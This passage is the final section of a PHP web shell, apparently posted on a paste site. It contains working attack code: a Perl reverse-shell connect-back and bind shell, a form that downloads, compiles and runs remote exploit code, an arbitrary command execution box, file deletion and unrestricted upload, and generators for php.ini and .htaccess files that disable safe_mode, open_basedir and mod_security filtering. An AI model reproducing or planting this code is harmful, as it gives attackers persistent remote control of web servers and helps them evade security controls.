  1818. $p2=which('perl');
  1819. exe($p2.' bcp '.$ip.' '.$port.' &');
  1820. $msg = 'Now script try connect to '.$ip.' port '.$port.' ...';
  1821. }
  1822. elseif (isset($_POST['expcompile']) &&!empty($_POST['wurl']) &&!empty($_POST['wcmd']))
  1823. {
  1824. $pilihan = trim($_POST['pilihan']);
  1825. $wurl = trim($_POST['wurl']);
  1826. $namafile = download($pilihan,$wurl);
  1827. if(is_file($namafile)) {$msg = exe($wcmd);}else $msg = "error: file not found $namafile";}
  1828. ;echo '
  1829. <table class="tabnet">
  1830. <tr>
  1831. <th>Port Binding</th>
  1832. <th>Connect Back</th>
  1833. <th>Load and Exploit</th>
  1834. </tr>
  1835. <tr>
  1836. <td>
  1837. <form method="post" actions="?y=';echo $pwd;;echo '&amp;x=netsploit">
  1838. <table>
  1839. <tr>
  1840. <td>Port</td>
  1841. <td>
  1842. <input class="inputz" type="text" name="port" size="26" value="';echo $bindport ;echo '">
  1843. </td>
  1844. </tr>
  1845. <tr>
  1846. <td>Password</td>
  1847. <td><input class="inputz" type="text" name="bind_pass" size="26" value="';echo $bindport_pass;;echo '"></td>
  1848. </tr>
  1849. <tr>
  1850. <td>Use</td>
  1851. <td style="text-align:justify">
  1852. <p>
  1853. <select class="inputz" size="1" name="use">
  1854. <option value="Perl">Perl</option>
  1855. <option value="C">C</option>
  1856. </select>
  1857. <input class="inputzbut" type="submit" name="bind" value="Bind !" style="width:120px">
  1858. </td>
  1859. </tr>
  1860. </table>
  1861. </form>
  1862. </td>
  1863. <td>
  1864. <form method="post" actions="?y=';echo $pwd;;echo '&amp;x=netsploit">
  1865. <table>
  1866. <tr>
  1867. <td>IP</td>
  1868. <td>
  1869. <input class="inputz" type="text" name="ip" size="26" value="';echo ((getenv('REMOTE_ADDR')) ?(getenv('REMOTE_ADDR')) : ('127.0.0.1'));;echo '">
  1870. </td>
  1871. </tr>
  1872. <tr>
  1873. <td>Port</td>
  1874. <td>
  1875. <input class="inputz" type="text" name="backport" size="26" value="';echo $bindport;;echo '">
  1876. </td>
  1877. </tr>
  1878. <tr>
  1879. <td>Use</td>
  1880. <td style="text-align:justify">
  1881. <p>
  1882. <select size="1" class="inputz" name="use">
  1883. <option value="Perl">Perl</option>
  1884. <option value="C">C</option>
  1885. </select>
  1886. <input type="submit" name="backconn" value="Connect !" class="inputzbut" style="width:120px">
  1887. </td>
  1888. </tr>
  1889. </table>
  1890. </form>
  1891. </td>
  1892. <td>
  1893. <form method="post" actions="?y=';echo $pwd;;echo '&amp;x=netsploit">
  1894. <table>
  1895. <tr>
  1896. <td>url</td>
  1897. <td><input class="inputz" type="text" name="wurl" style="width:250px;" value="www.some-code/exploits.c"></td>
  1898. </tr>
  1899. <tr>
  1900. <td>cmd</td>
  1901. <td><input class="inputz" type="text" name="wcmd" style="width:250px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td>
  1902. </tr>
  1903. <tr>
  1904. <td>
  1905. <select size="1" class="inputz" name="pilihan">
  1906. <option value="wwget">wget</option>
  1907. <option value="wlynx">lynx</option>
  1908. <option value="wfread">fread</option>
  1909. <option value="wfetch">fetch</option>
  1910. <option value="wlinks">links</option>
  1911. <option value="wget">GET</option>
  1912. <option value="wcurl">curl</option>
  1913. </select>
  1914. </td>
  1915. <td colspan="2">
  1916. <input type="submit" name="expcompile" class="inputzbut" value="Go !" style="width:246px;">
  1917. </td>
  1918. </tr>
  1919. </table>
  1920. </form>
  1921. </td>
  1922. </tr>
  1923. </table>
  1924. <div style="text-align:center;margin:2px;">';echo $msg;;echo '</div>
  1925. ';}
  1926. elseif(isset($_GET['x']) &&($_GET['x'] == 'shell'))
  1927. {
  1928. ;echo '
  1929. <form action="?y=';echo $pwd;;echo '&amp;x=shell" method="post">
  1930. <table class="cmdbox">
  1931. <tr>
  1932. <td colspan="2">
  1933. <textarea class="output" readonly> ';if(isset($_POST['submitcmd'])) {echo @exe($_POST['cmd']);};echo ' </textarea>
  1934. </td>
  1935. </tr>
  1936. <tr>
  1937. <td colspan="2">';echo $prompt;;echo ' <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" />
  1938. <input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:12%;" />
  1939. </td>
  1940. </tr>
  1941. </table>
  1942. </form> ';
  1943. }
  1944. else
  1945. {
  1946. if(isset($_GET['delete']) &&($_GET['delete'] != ''))
  1947. {
  1948. $file = $_GET['delete'];@unlink($file);
  1949. }
  1950. elseif(isset($_GET['fdelete']) &&($_GET['fdelete'] != ''))
  1951. {
  1952. @rmdir(rtrim($_GET['fdelete'],DIRECTORY_SEPARATOR));
  1953. }
  1954. elseif(isset($_GET['mkdir']) &&($_GET['mkdir'] != ''))
  1955. {
  1956. $path = $pwd.$_GET['mkdir'];@mkdir($path);
  1957. }
  1958. $buff = showdir($pwd,$prompt);
  1959. echo $buff;
  1960. }
  1961. echo '<form action="?y='.$pwd.'&amp;x=shell" method="post" style="margin:8px 0 0 0;">
  1962. <table class="cmdbox" style="width:50%;"align="right">
  1963. <td>CMD@'.$prompt.'</td>
  1964. <td><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:400px;" value="" />
  1965. <input class="inputzbut" type="submit" value="Execute !" name="submitcmd" style="width:80px;" /></td>
  1966. <br>
  1967. </form>
  1968. </table>
  1969. <table class="cmdbox" style="width:50%;"align="right">
  1970. <form action="?" method="get" style="margin:8px 0 0 0;">
  1971. <input type="hidden" name="y" value="'.$pwd.'" />
  1972. <tr>
  1973. <td>View File/Folder</td>
  1974. <td><input onMouseOver="this.focus();" id="goto" class="inputz" type="text" name="view" style="width:400px;" value="'.$pwd.'" />
  1975. <input class="inputzbut" type="submit" value="Enter !" name="submitcmd" style="width:80px;" /></td>
  1976. </tr>
  1977. </form></table>
  1978. <form method="POST">
  1979. <td>&nbsp;&nbsp;Tool</td><table style="width:50%;"align="left">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
  1980. <select class="inputz" style="width:402px;" name="someAction">
  1981. <option value="genHtaccess">Generate .Htaccess</option>
  1982. <option value="genPhp">Generate PHP.INI</option>
  1983. <option value="genINI">Generate INI.PHP</option>
  1984. </select>
  1985. <input style="width:80px;" class="inputzbut" type="submit" value="Do Action" name="doAction">
  1986. </form></table>
  1987. ';
  1988. if($_POST['doAction'] &&($_POST['someAction'] == 'genPhp'))
  1989. {
  1990. $file = 'php.ini';
  1991. $filez = "$file";
  1992. $filex = fopen ($filez ,'w');
  1993. $file = 'safe_mode = Off
  1994. disable_functions = NONE
  1995. safe_mode_gid = OFF
  1996. open_basedir = OFF';
  1997. fwrite ( $filex ,$file ) ;
  1998. fclose ($filex);
  1999. echo '[+] php.ini Has Been Generated Successfully';
  2000. }
  2001. else if($_POST['doAction'] &&($_POST['someAction'] == 'genHtaccess'))
  2002. {
  2003. $file = '.htaccess';
  2004. $filez = "$file";
  2005. $filex = fopen ($filez ,'w');
  2006. $file = '<IfModule mod_security.c>
  2007. SecFilterEngine Off
  2008. SecFilterScanPOST Off
  2009. SecFilterCheckURLEncoding Off
  2010. SecFilterCheckCookieFormat Off
  2011. SecFilterCheckUnicodeEncoding Off
  2012. SecFilterNormalizeCookies Off
  2013. </IfModule>
  2014. <Limit GET POST>
  2015. order deny,allow
  2016. deny from all
  2017. allow from all
  2018. </Limit>
  2019. <Limit PUT DELETE>
  2020. order deny,allow
  2021. deny from all
  2022. </Limit>
  2023. SetEnv PHPRC '.getcwd().'/php.ini';
  2024. fwrite ( $filex ,$file ) ;
  2025. fclose ($filex);
  2026. echo '[+] .htaccess Has Been Generated Successfully';
  2027. }
  2028. else if($_POST['doAction'] &&($_POST['someAction'] == 'genINI'))
  2029. {
  2030. $file = 'ini.php';
  2031. $filez = "$file";
  2032. $filex = fopen ($filez ,'w');
  2033. $file = 'ini_restore("safe_mode");
  2034. ini_restore("open_basedir");';
  2035. fwrite ( $filex ,$file ) ;
  2036. fclose ($filex);
  2037. echo '[+] ini.php Has Been Generated Successfully';
  2038. }
  2039. echo '</tr>
  2040. <table style="width:50%;"align="left">
  2041. <td>&nbsp;Upload File&nbsp;&nbsp;&nbsp;&nbsp;</td>
  2042. <td><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">
  2043. <td><input style="width:400px;" class="inputzbut" type="file" name="file" size="50" ><input class="inputzbut" style="width:80px;" name="_upl" type="submit" id="_upl" value="Upload"></form>
  2044. </table></td>';
  2045. if( $_POST['_upl'] == 'Upload') {
  2046. if(@copy($_FILES['file']['tmp_name'],$_FILES['file']['name'])) {echo '<br><br>Have A Nice Day Dude ^_^';}
  2047. else {echo '<br><br>Failed';}}
  2048. echo '<br><br><br><br>';
  2049. ;echo '</div>
  2050. </body>
  2051. </html>
  2052. ';
  2053. ?>
Add Comment
Please, Sign In to add comment